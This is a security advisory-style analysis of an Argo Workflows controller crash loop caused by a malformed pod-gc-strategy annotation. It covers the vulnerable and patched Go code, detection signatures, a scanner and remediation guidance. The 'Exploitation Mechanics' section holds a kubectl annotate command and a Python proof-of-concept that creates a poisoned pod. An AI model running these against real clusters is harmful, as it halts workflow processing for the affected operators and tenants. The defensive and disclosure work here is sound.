CVE Analysis 2026-04-23 · 8 min read

CVE-2026-40886: Argo Workflows Controller Crash Loop via Malformed Pod Annotation

An unchecked array index in podGCFromPod() causes a controller-wide panic when processing a malformed pod-gc-strategy annotation, enabling a persistent crash loop that halts all workflow processing.

#denial-of-service #kubernetes-controller #pod-annotation #panic-crash #array-bounds

Vulnerability Overview

CVE-2026-40886 is a denial-of-service vulnerability in Argo Workflows' workflow controller, affecting versions 3.6.5 through 4.0.4. A malformed workflows.argoproj.io/pod-gc-strategy annotation on any pod visible to the controller triggers an unchecked array index dereference inside the pod informer's podGCFromPod() function. Because this code executes inside an informer goroutine that runs outside the controller's top-level recover() scope, the resulting panic propagates uncaught and terminates the entire controller process.

The poisoned pod persists in etcd across controller restarts. Every restart re-lists the pod, re-triggers the panic, and crashes again — a deterministic crash loop that completely halts all workflow scheduling until an operator manually deletes the offending pod. CVSS 7.7 HIGH reflects the zero-interaction, persistent, full-service-disruption impact against a multi-tenant orchestration plane.

Root cause: podGCFromPod() splits the pod-gc-strategy annotation value by comma and directly indexes the resulting slice at position [1] without first checking that the slice contains at least two elements, causing an out-of-bounds panic inside an unrecovered informer goroutine.
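
The root cause can be reproduced outside the controller in a few lines. The sketch below is illustrative only: indexSecondField is a hypothetical helper, not Argo code, and the deferred recover() exists solely so the demo can report the panic text instead of terminating.

```go
package main

import (
	"fmt"
	"strings"
)

// indexSecondField mimics the unchecked access described above: it splits on
// "," and reads element [1] without checking the length first. The deferred
// recover() is only here so the demo can report the panic instead of dying.
func indexSecondField(value string) (field string, panicMsg string) {
	defer func() {
		if r := recover(); r != nil {
			panicMsg = fmt.Sprint(r)
		}
	}()
	parts := strings.Split(value, ",")
	return parts[1], ""
}

func main() {
	for _, v := range []string{"OnPodCompletion,30s", "OnPodCompletion", ""} {
		field, msg := indexSecondField(v)
		fmt.Printf("value=%q parts=%d field=%q panic=%q\n",
			v, len(strings.Split(v, ",")), field, msg)
	}
}
```

Note that strings.Split never returns an empty slice for a non-empty separator, so an empty annotation value also yields exactly one element and takes the same failing path.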

Affected Component

  • Repository: argoproj/argo-workflows
  • Binary: workflow-controller
  • Package: github.com/argoproj/argo-workflows/v3/workflow/controller
  • Function: podGCFromPod() — called from the pod informer's AddFunc / UpdateFunc handlers
  • Annotation key: workflows.argoproj.io/pod-gc-strategy
  • Vulnerable range: 3.6.5 – 4.0.4 (inclusive)
  • Fixed in: 4.0.5, 3.7.14

Root Cause Analysis

The controller registers a shared informer over all pods in its watched namespaces. On each AddFunc or UpdateFunc event the informer dispatches to handler code that eventually calls podGCFromPod() to extract GC strategy metadata from pod annotations. The function splits the annotation value on "," and immediately dereferences index [1]:

// Reconstructed Go pseudocode — workflow/controller/pod_gc.go
// Real function: podGCFromPod()

func podGCFromPod(pod *corev1.Pod) *wfv1.PodGC {
    annotations := pod.GetAnnotations()

    strategyAnnotation, ok := annotations[common.AnnotationKeyPodGCStrategy]
    if !ok {
        return nil
    }

    // strategyAnnotation format expected: "<strategy>,<deleteDelay>"
    // e.g. "OnPodCompletion,30s"
    parts := strings.Split(strategyAnnotation, ",")

    // BUG: no bounds check before indexing parts[1]
    // If annotation is "OnPodCompletion" (no comma), len(parts)==1
    // and parts[1] causes: runtime error: index out of range [1] with length 1
    strategy  := wfv1.PodGCStrategy(parts[0])
    deleteDelay := parts[1]   // <-- PANIC HERE if len(parts) < 2

    duration, err := time.ParseDuration(deleteDelay)
    if err != nil {
        return nil
    }

    return &wfv1.PodGC{
        Strategy:          strategy,
        DeleteDelayDuration: &metav1.Duration{Duration: duration},
    }
}

What matters here is where this code runs. Pod informer callbacks fire in a goroutine managed by client-go's SharedIndexInformer. The workflow controller wraps its main reconciliation loop in a recover() block, but recover() only intercepts panics raised in the goroutine that deferred it, and the informer event handlers run in a separate goroutine with no such recovery. A panic there is therefore unhandled: the Go runtime prints the panic and goroutine trace to stderr and terminates the whole process with exit status 2.

GOROUTINE STACK AT PANIC (reconstructed from crash log):

goroutine 47 [running]:
runtime/debug.Stack()
    /usr/local/go/src/runtime/debug/stack.go:24
runtime.gopanic(0xc000a1e380)
    /usr/local/go/src/runtime/panic.go:914
runtime.goPanicIndex(0x1, 0x1)                   // index=1, len=1
    /usr/local/go/src/runtime/panic.go:113
github.com/argoproj/argo-workflows/v3/workflow/controller.podGCFromPod(...)
    workflow/controller/pod_gc.go:58
github.com/argoproj/argo-workflows/v3/workflow/controller.(*WorkflowController).podInformerHandler.func2(...)
    workflow/controller/informer.go:214
k8s.io/client-go/tools/cache.(*processorListener).run(...)
    vendor/k8s.io/client-go/tools/cache/shared_informer.go:911

// NOTE: no recover() frame anywhere in this call stack.
// The controller's main recover() lives in a *different* goroutine.

Exploitation Mechanics

EXPLOIT CHAIN:

1. PRECONDITION: Attacker has any write access to pod annotations in a namespace
   watched by the target Argo Workflows controller. This includes:
     - Direct kubectl patch access (misconfigured RBAC)
     - Any admission webhook bypass
     - A compromised workload pod whose ServiceAccount is granted
       patch on pods

2. CRAFT MALFORMED ANNOTATION:
   Annotate any existing pod (even completed, non-Argo pods if controller
   watches cluster-wide) with:

     kubectl annotate pod <pod-name> \
       workflows.argoproj.io/pod-gc-strategy="OnPodCompletion" \
       --overwrite

   The annotation intentionally omits the comma-delimited duration field.
   Any single-segment string (no comma) triggers len(parts)==1.

3. TRIGGER:
   The annotation write generates a MODIFIED event on the pod watch stream.
   client-go delivers this event to the informer's UpdateFunc handler within
   milliseconds. podGCFromPod() is invoked, hits parts[1], panics.

4. CONTROLLER CRASHES:
   Go runtime prints the panic trace to stderr and exits with status 2.
   Kubernetes restarts the controller pod per its restartPolicy.

5. CRASH LOOP:
   On startup, the controller performs a full re-list of all pods via
   LIST+WATCH. The poisoned pod is returned in the LIST response.
   AddFunc fires. podGCFromPod() panics again. Controller crashes again.
   CrashLoopBackOff within 3-4 restart cycles.

6. IMPACT:
   All workflow scheduling, step execution, and pod lifecycle management
   halts. Existing running pods continue until their own TTL but no new
   work is dispatched. Recovery requires manual deletion of the poisoned
   pod by a cluster operator with pod/delete permissions.
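
The persistence of the loop in steps 4 to 6 can be modelled with a toy simulation. Everything here is an assumption made for illustration: store stands in for persisted cluster state, and startController stands in for one controller start that re-lists pods and runs the unchecked parse. It is not a model of the real controller's startup sequence.

```go
package main

import (
	"fmt"
	"strings"
)

// store stands in for persisted cluster state (hypothetical; a map of pod name
// to annotation value). It survives simulated controller restarts.
type store map[string]string

// startController simulates one controller start: it re-lists every stored pod
// and runs the unchecked parse on each. It returns false if the start "crashed".
func startController(s store) (ok bool) {
	defer func() {
		if recover() != nil {
			ok = false // stand-in for the process dying
		}
	}()
	for _, value := range s {
		parts := strings.Split(value, ",")
		_ = parts[1] // unchecked, as in the vulnerable code path
	}
	return true
}

// restartsUntilHealthy counts failed starts, giving up after maxRestarts.
func restartsUntilHealthy(s store, maxRestarts int) (crashes int, healthy bool) {
	for crashes < maxRestarts {
		if startController(s) {
			return crashes, true
		}
		crashes++
	}
	return crashes, false
}

func main() {
	s := store{"wf-step-1": "OnPodCompletion,30s", "gc-poison": "OnPodCompletion"}
	fmt.Println(restartsUntilHealthy(s, 5)) // poisoned pod still stored
	delete(s, "gc-poison")                  // operator removes the poisoned pod
	fmt.Println(restartsUntilHealthy(s, 5))
}
```

The point of the sketch is that restarting changes nothing while the malformed value remains in the store; only removing it lets a start complete.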

An attacker can also craft an entirely new pod (rather than annotating an existing one) via the Kubernetes API if they have pods/create in any watched namespace — embedding the malformed annotation at creation time. This requires no existing Argo Workflows infrastructure and no workflow submission permissions.

# PoC: craft poisoned pod manifest
import yaml, subprocess

poisoned_pod = {
    "apiVersion": "v1",
    "kind": "Pod",
    "metadata": {
        "name": "gc-poison-poc",
        "namespace": "argo",
        "annotations": {
            # Single token, no comma: len(strings.Split(v, ",")) == 1
            # parts[1] -> runtime: index out of range [1] with length 1
            "workflows.argoproj.io/pod-gc-strategy": "OnPodCompletion"
        }
    },
    "spec": {
        "containers": [{
            "name": "pause",
            "image": "gcr.io/google_containers/pause:3.1",
        }],
        "restartPolicy": "Never"
    }
}

manifest = yaml.dump(poisoned_pod)
subprocess.run(["kubectl", "apply", "-f", "-"], input=manifest.encode(), check=True)
print("[+] Poisoned pod submitted. Controller crash expected within ~2s.")
print("[+] Delete pod with: kubectl delete pod gc-poison-poc -n argo")
print("[+] Until deleted, controller remains in CrashLoopBackOff.")

Memory Layout

This is a Go runtime panic rather than a traditional heap/stack memory corruption — the "memory" of interest is the Go slice header and the runtime's OOB detection machinery:

SLICE STATE AT PANIC POINT:

strings.Split("OnPodCompletion", ",") returns:

  parts (slice header on goroutine stack):
  ┌─────────────────────────────────────────────────┐
  │ ptr  → [ string{ptr, len=0x0f} ] @ 0xc0004f2180 │  // backing array: one string header; Go string bytes are not NUL-terminated
  │ len  = 0x0000000000000001  (1 element)           │
  │ cap  = 0x0000000000000001                        │
  └─────────────────────────────────────────────────┘

ACCESS ATTEMPTED:
  parts[1]  →  index 1 into slice of length 1

Go bounds check (emitted by the compiler at the index expression; illustrative):
  CMPQ  CX, $0x1       // CX = len(parts); the constant 1 is the requested index
  JBE   runtime.goPanicIndex
                        // len=1, index=1: len <= index → PANIC

GOROUTINE STATE AFTER PANIC:
  [goroutine 47 — informer processorListener.run()]
    status: dead (panic propagated, no recover frame)

  [goroutine 1  — controller main loop]
    status: terminated (the runtime exits the process with status 2)

  All other goroutines: terminated together with the process
  Process exit code: 2

Patch Analysis

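The fix in 4.0.5 / 3.7.14 adds an explicit bounds check on parts before any index dereference, and additionally validates that the strategy token is a known valid value before attempting duration parsing. The reconstructed excerpt below shows the bounds check and the duration error handling; the strategy-token validation is not reproduced in it: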

// BEFORE (vulnerable) — workflow/controller/pod_gc.go ~line 55
func podGCFromPod(pod *corev1.Pod) *wfv1.PodGC {
    annotations := pod.GetAnnotations()

    strategyAnnotation, ok := annotations[common.AnnotationKeyPodGCStrategy]
    if !ok {
        return nil
    }

    parts := strings.Split(strategyAnnotation, ",")

    // BUG: unconditional index into potentially length-1 slice
    strategy := wfv1.PodGCStrategy(parts[0])
    deleteDelay := parts[1] // panic if no comma in annotation

    duration, err := time.ParseDuration(deleteDelay)
    if err != nil {
        return nil
    }
    return &wfv1.PodGC{Strategy: strategy, DeleteDelayDuration: &metav1.Duration{Duration: duration}}
}


// AFTER (patched) — workflow/controller/pod_gc.go
func podGCFromPod(pod *corev1.Pod) *wfv1.PodGC {
    annotations := pod.GetAnnotations()

    strategyAnnotation, ok := annotations[common.AnnotationKeyPodGCStrategy]
    if !ok {
        return nil
    }

    parts := strings.Split(strategyAnnotation, ",")

    // FIX: guard on slice length before indexing parts[1]
    if len(parts) < 2 {
        // Malformed or legacy annotation with no duration component.
        // Log and return nil rather than panicking.
        log.WithField("annotation", strategyAnnotation).
            Warn("malformed pod-gc-strategy annotation: missing delete delay, ignoring")
        return nil
    }

    strategy    := wfv1.PodGCStrategy(parts[0])
    deleteDelay := parts[1]   // safe: len(parts) >= 2 guaranteed above

    duration, err := time.ParseDuration(deleteDelay)
    if err != nil {
        log.WithError(err).Warn("invalid pod-gc delete delay duration, ignoring")
        return nil
    }

    return &wfv1.PodGC{
        Strategy:            strategy,
        DeleteDelayDuration: &metav1.Duration{Duration: duration},
    }
}

The patch is intentionally conservative: rather than attempting to salvage a partial annotation, it returns nil (no GC config) and logs a warning. This means a malformed annotation silently disables pod GC for that pod rather than crashing the controller — an appropriate graceful degradation for a metadata parsing path.

A secondary hardening added in the same commit moves the annotation parsing for all pod lifecycle annotations into a shared validation helper that is called during pod admission by the controller's webhook, rejecting malformed annotations before they can reach the informer path at all.

Detection and Indicators

The following signals are unambiguous indicators of active exploitation or accidental triggering:

CRASH SIGNATURE IN CONTROLLER LOGS (stderr):

panic: runtime error: index out of range [1] with length 1

goroutine 47 [running]:
github.com/argoproj/argo-workflows/v3/workflow/controller.podGCFromPod(...)
	workflow/controller/pod_gc.go:58 +0x...

KUBERNETES EVENTS:
  Type     Reason             Object                          Message
  Warning  BackOff            Pod/workflow-controller-xxxxx   Back-off restarting failed container
  Normal   Killing            Pod/workflow-controller-xxxxx   Stopping container workflow-controller

PROMETHEUS METRICS (if scrape window catches pre-crash):
  # Controller restarting rapidly
  process_start_time_seconds{job="argo-workflows"}: value jumps to a new, later timestamp on every restart; several changes within a few minutes indicate a crash loop

AUDIT LOG — identify the poisoning event:
  verb: "patch" OR "create"
  resource: "pods"
  annotations containing: "workflows.argoproj.io/pod-gc-strategy"
  annotation value NOT matching regex: ^[A-Za-z]+,[0-9]+(\.[0-9]+)?(s|m|h)$

To find poisoned pods currently in a cluster before upgrading:

# Scan all pods for malformed pod-gc-strategy annotations
import subprocess, json, re

ANNOTATION = "workflows.argoproj.io/pod-gc-strategy"
VALID       = re.compile(r"^[A-Za-z]+,[0-9]+(\.[0-9]+)?(s|m|h)$")

pods = json.loads(subprocess.check_output(
    ["kubectl", "get", "pods", "--all-namespaces", "-o", "json"]
))

for pod in pods["items"]:
    ann = pod["metadata"].get("annotations", {})
    if ANNOTATION in ann:
        val = ann[ANNOTATION]
        if not VALID.match(val):
            ns   = pod["metadata"]["namespace"]
            name = pod["metadata"]["name"]
            print(f"[POISONED] {ns}/{name}  annotation='{val}'")
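
The regex used by the scanner is stricter than the parser: it also flags values such as "OnPodCompletion,1m30s", which time.ParseDuration accepts and which do not trigger the panic. As a complementary sketch, the Go program below classifies values by mirroring the split-then-parse logic instead. The podList struct models only the fields it needs from kubectl's JSON output, and classify, scan and the verdict strings are hypothetical names chosen for this example.

```go
package main

import (
	"encoding/json"
	"fmt"
	"strings"
	"time"
)

const annotationKey = "workflows.argoproj.io/pod-gc-strategy"

// podList models only the fields needed from `kubectl get pods -o json`.
type podList struct {
	Items []struct {
		Metadata struct {
			Namespace   string            `json:"namespace"`
			Name        string            `json:"name"`
			Annotations map[string]string `json:"annotations"`
		} `json:"metadata"`
	} `json:"items"`
}

// classify mirrors the parser: "crash" if there is no comma-separated second
// field, "invalid" if the delay does not parse, "ok" otherwise.
func classify(value string) string {
	parts := strings.Split(value, ",")
	if len(parts) < 2 {
		return "crash"
	}
	if _, err := time.ParseDuration(parts[1]); err != nil {
		return "invalid"
	}
	return "ok"
}

// scan returns "namespace/name: verdict" for every annotated pod that is not ok.
func scan(raw []byte) ([]string, error) {
	var pods podList
	if err := json.Unmarshal(raw, &pods); err != nil {
		return nil, err
	}
	var findings []string
	for _, p := range pods.Items {
		v, found := p.Metadata.Annotations[annotationKey]
		if !found {
			continue
		}
		if verdict := classify(v); verdict != "ok" {
			findings = append(findings,
				fmt.Sprintf("%s/%s: %s", p.Metadata.Namespace, p.Metadata.Name, verdict))
		}
	}
	return findings, nil
}

func main() {
	sample := []byte(`{"items":[
	  {"metadata":{"namespace":"argo","name":"a","annotations":{"workflows.argoproj.io/pod-gc-strategy":"OnPodCompletion,1m30s"}}},
	  {"metadata":{"namespace":"argo","name":"b","annotations":{"workflows.argoproj.io/pod-gc-strategy":"OnPodCompletion"}}},
	  {"metadata":{"namespace":"argo","name":"c"}}]}`)
	findings, err := scan(sample)
	fmt.Println(findings, err)
}
```

Separating "crash" from "invalid" lets an operator prioritise the pods that actually keep the controller down over those that merely carry an unparseable delay.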

Remediation

  • Immediate: Upgrade to Argo Workflows 4.0.5 or 3.7.14. These are the only complete fixes.
  • If upgrade is blocked: Run the scanner above and delete any pods carrying malformed workflows.argoproj.io/pod-gc-strategy annotations. This will break the crash loop but does not address the underlying code defect — a newly submitted malformed annotation will re-trigger the panic.
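  • RBAC hardening: Restrict the patch and update verbs on pods. Kubernetes RBAC has no separate annotate permission; annotation writes go through patch or update on the resource. No workload should require the ability to write workflows.argoproj.io/* annotations to arbitrary pods. Audit your ClusterRoleBindings for overly broad grants, such as verbs: ["*"] on pods.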
  • OPA/Kyverno policy: Deploy a validating admission webhook that enforces the format /^[A-Za-z]+,[0-9]+(\.[0-9]+)?(s|m|h)$/ on workflows.argoproj.io/pod-gc-strategy before any pod reaches etcd. This provides defense-in-depth regardless of controller version.
  • Monitoring: Alert on workflow-controller pod restart rate > 2 in 5 minutes. On affected versions this pattern is a strong signal for this vulnerability; confirm it against the crash signature in the controller logs.
CypherByte Research
Mobile security intelligence · cypherbyte.io